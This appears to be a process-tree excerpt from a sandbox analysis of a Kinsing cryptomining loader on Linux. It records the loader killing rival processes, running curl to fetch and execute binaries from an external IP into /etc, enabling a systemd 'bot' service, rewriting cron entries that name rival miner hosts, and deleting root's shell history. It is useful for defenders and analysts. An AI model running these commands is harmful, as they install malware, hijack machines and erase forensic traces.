-
/usr/bin/grepgrep -v php-fpm2⤵PID:1853
-
-
/usr/bin/grepgrep -v "("2⤵PID:1852
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1851
-
-
/usr/bin/grepgrep -v bin2⤵PID:1850
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1849
-
-
/usr/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1848
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1865
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1866
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1867
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1868
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1869
-
-
/usr/bin/grepgrep -v php-fpm2⤵PID:1864
-
-
/usr/bin/grepgrep -v "("2⤵PID:1863
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1862
-
-
/usr/bin/grepgrep -v bin2⤵PID:1861
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1860
-
-
/usr/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1859
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1874
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1873
-
-
/usr/bin/grepgrep /tmp/sscks2⤵PID:1872
-
-
/usr/bin/grepgrep -v grep2⤵PID:1871
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1870
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:1879
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵PID:1880
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2375
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:2380
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵PID:2381
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2383
-
-
/usr/bin/chmodchmod 777 /etc/libsystem.so2⤵PID:2392
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵PID:2393
-
-
/usr/bin/chmodchmod +x /etc/libsystem.so2⤵PID:2404
-
-
/usr/bin/chmodchmod 777 /etc/libsystem.so2⤵PID:2409
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵PID:2410
-
-
/usr/bin/chmodchmod +x /etc/libsystem.so2⤵PID:2433
-
-
/usr/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:2438
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:2439
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2440
-
-
/etc/kinsing/etc/kinsing2⤵PID:2441
-
-
/usr/bin/idid -u2⤵PID:2442
-
-
/usr/bin/systemctlsystemctl enable bot2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2443
-
-
/usr/bin/systemctlsystemctl start bot2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2469
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2473
-
-
/usr/bin/crontabcrontab -l2⤵PID:2471
-
-
/usr/bin/sedsed /base64/d2⤵PID:2472
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2487
-
-
/usr/bin/sedsed /_cron/d2⤵PID:2486
-
-
/usr/bin/crontabcrontab -l2⤵PID:2485
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2490
-
-
/usr/bin/sedsed /31.210.20.181/d2⤵PID:2489
-
-
/usr/bin/crontabcrontab -l2⤵PID:2488
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2497
-
-
/usr/bin/sedsed /update.sh/d2⤵PID:2496
-
-
/usr/bin/crontabcrontab -l2⤵PID:2495
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2500
-
-
/usr/bin/sedsed /logo4/d2⤵PID:2499
-
-
/usr/bin/crontabcrontab -l2⤵PID:2498
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2503
-
-
/usr/bin/sedsed /logo9/d2⤵PID:2502
-
-
/usr/bin/crontabcrontab -l2⤵PID:2501
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2506
-
-
/usr/bin/sedsed /logo0/d2⤵PID:2505
-
-
/usr/bin/crontabcrontab -l2⤵PID:2504
-
-
/usr/bin/sedsed /logo/d2⤵PID:2508
-
-
/usr/bin/crontabcrontab -l2⤵PID:2507
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2509
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2512
-
-
/usr/bin/sedsed /tor2web/d2⤵PID:2511
-
-
/usr/bin/crontabcrontab -l2⤵PID:2510
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2515
-
-
/usr/bin/sedsed /jpg/d2⤵PID:2514
-
-
/usr/bin/crontabcrontab -l2⤵PID:2513
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2518
-
-
/usr/bin/sedsed /png/d2⤵PID:2517
-
-
/usr/bin/crontabcrontab -l2⤵PID:2516
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2521
-
-
/usr/bin/sedsed /tmp/d2⤵PID:2520
-
-
/usr/bin/crontabcrontab -l2⤵PID:2519
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2524
-
-
/usr/bin/sedsed /zmreplchkr/d2⤵PID:2523
-
-
/usr/bin/crontabcrontab -l2⤵PID:2522
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2527
-
-
/usr/bin/sedsed /aliyun.one/d2⤵PID:2526
-
-
/usr/bin/crontabcrontab -l2⤵PID:2525
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2530
-
-
/usr/bin/sedsed /3.215.110.66.one/d2⤵PID:2529
-
-
/usr/bin/crontabcrontab -l2⤵PID:2528
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2533
-
-
/usr/bin/sedsed /pastebin/d2⤵PID:2532
-
-
/usr/bin/crontabcrontab -l2⤵PID:2531
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2536
-
-
/usr/bin/sedsed /onion/d2⤵PID:2535
-
-
/usr/bin/crontabcrontab -l2⤵PID:2534
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2539
-
-
/usr/bin/sedsed /lsd.systemten.org/d2⤵PID:2538
-
-
/usr/bin/crontabcrontab -l2⤵PID:2537
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2542
-
-
/usr/bin/sedsed /shuf/d2⤵PID:2541
-
-
/usr/bin/crontabcrontab -l2⤵PID:2540
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2545
-
-
/usr/bin/sedsed /ash/d2⤵PID:2544
-
-
/usr/bin/crontabcrontab -l2⤵PID:2543
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2548
-
-
/usr/bin/sedsed /mr.sh/d2⤵PID:2547
-
-
/usr/bin/crontabcrontab -l2⤵PID:2546
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2551
-
-
/usr/bin/sedsed /185.181.10.234/d2⤵PID:2550
-
-
/usr/bin/crontabcrontab -l2⤵PID:2549
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2554
-
-
/usr/bin/sedsed /localhost.xyz/d2⤵PID:2553
-
-
/usr/bin/crontabcrontab -l2⤵PID:2552
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2557
-
-
/usr/bin/sedsed /45.137.151.106/d2⤵PID:2556
-
-
/usr/bin/crontabcrontab -l2⤵PID:2555
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2560
-
-
/usr/bin/sedsed /111.90.159.106/d2⤵PID:2559
-
-
/usr/bin/crontabcrontab -l2⤵PID:2558
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2563
-
-
/usr/bin/sedsed /github/d2⤵PID:2562
-
-
/usr/bin/crontabcrontab -l2⤵PID:2561
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2566
-
-
/usr/bin/sedsed /bigd1ck.com/d2⤵PID:2565
-
-
/usr/bin/crontabcrontab -l2⤵PID:2564
-
-
/usr/bin/sedsed /xmr.ipzse.com/d2⤵PID:2568
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2569
-
-
/usr/bin/crontabcrontab -l2⤵PID:2567
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2572
-
-
/usr/bin/sedsed /185.181.10.234/d2⤵PID:2571
-
-
/usr/bin/crontabcrontab -l2⤵PID:2570
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2575
-
-
/usr/bin/sedsed /146.71.79.230/d2⤵PID:2574
-
-
/usr/bin/crontabcrontab -l2⤵PID:2573
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2578
-
-
/usr/bin/sedsed /122.51.164.83/d2⤵PID:2577
-
-
/usr/bin/crontabcrontab -l2⤵PID:2576
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2581
-
-
/usr/bin/sedsed /newdat.sh/d2⤵PID:2580
-
-
/usr/bin/crontabcrontab -l2⤵PID:2579
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2584
-
-
/usr/bin/sedsed /lib.pygensim.com/d2⤵PID:2583
-
-
/usr/bin/crontabcrontab -l2⤵PID:2582
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2587
-
-
/usr/bin/sedsed /t.amynx.com/d2⤵PID:2586
-
-
/usr/bin/crontabcrontab -l2⤵PID:2585
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2590
-
-
/usr/bin/sedsed /update.sh/d2⤵PID:2589
-
-
/usr/bin/crontabcrontab -l2⤵PID:2588
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2593
-
-
/usr/bin/sedsed /systemd-service.sh/d2⤵PID:2592
-
-
/usr/bin/crontabcrontab -l2⤵PID:2591
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2596
-
-
/usr/bin/sedsed /pg_stat.sh/d2⤵PID:2595
-
-
/usr/bin/crontabcrontab -l2⤵PID:2594
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2599
-
-
/usr/bin/sedsed /sleep/d2⤵PID:2598
-
-
/usr/bin/crontabcrontab -l2⤵PID:2597
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2602
-
-
/usr/bin/sedsed /oka/d2⤵PID:2601
-
-
/usr/bin/crontabcrontab -l2⤵PID:2600
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2605
-
-
/usr/bin/sedsed /linux1213/d2⤵PID:2604
-
-
/usr/bin/crontabcrontab -l2⤵PID:2603
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2608
-
-
/usr/bin/sedsed "/#wget/d"2⤵PID:2607
-
-
/usr/bin/crontabcrontab -l2⤵PID:2606
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2611
-
-
/usr/bin/sedsed "/#curl/d"2⤵PID:2610
-
-
/usr/bin/crontabcrontab -l2⤵PID:2609
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2614
-
-
/usr/bin/sedsed /zsvc/d2⤵PID:2613
-
-
/usr/bin/crontabcrontab -l2⤵PID:2612
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2617
-
-
/usr/bin/sedsed /givemexyz/d2⤵PID:2616
-
-
/usr/bin/crontabcrontab -l2⤵PID:2615
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2620
-
-
/usr/bin/sedsed /world/d2⤵PID:2619
-
-
/usr/bin/crontabcrontab -l2⤵PID:2618
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2623
-
-
/usr/bin/sedsed /1.sh/d2⤵PID:2622
-
-
/usr/bin/crontabcrontab -l2⤵PID:2621
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2626
-
-
/usr/bin/sedsed /3.sh/d2⤵PID:2625
-
-
/usr/bin/crontabcrontab -l2⤵PID:2624
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2629
-
-
/usr/bin/sedsed /workers/d2⤵PID:2628
-
-
/usr/bin/crontabcrontab -l2⤵PID:2627
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2632
-
-
/usr/bin/sedsed /oracleservice/d2⤵PID:2631
-
-
/usr/bin/crontabcrontab -l2⤵PID:2630
-
-
/usr/bin/grepgrep -v grep2⤵PID:2635
-
-
/usr/bin/grepgrep -e 185.191.32.1982⤵PID:2634
-
-
/usr/bin/crontabcrontab -l2⤵PID:2633
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2637
-
-
/usr/bin/rmrm -rf /root/.bash_history2⤵PID:2639
-
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:1878
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:1877
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2379
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:2378
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2387
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:2386
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2391
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2390
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2408
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2407
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2437
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2436
-
/usr/bin/crontabcrontab -l1⤵PID:2638
Network
MITRE ATT&CK Enterprise v15
Downloads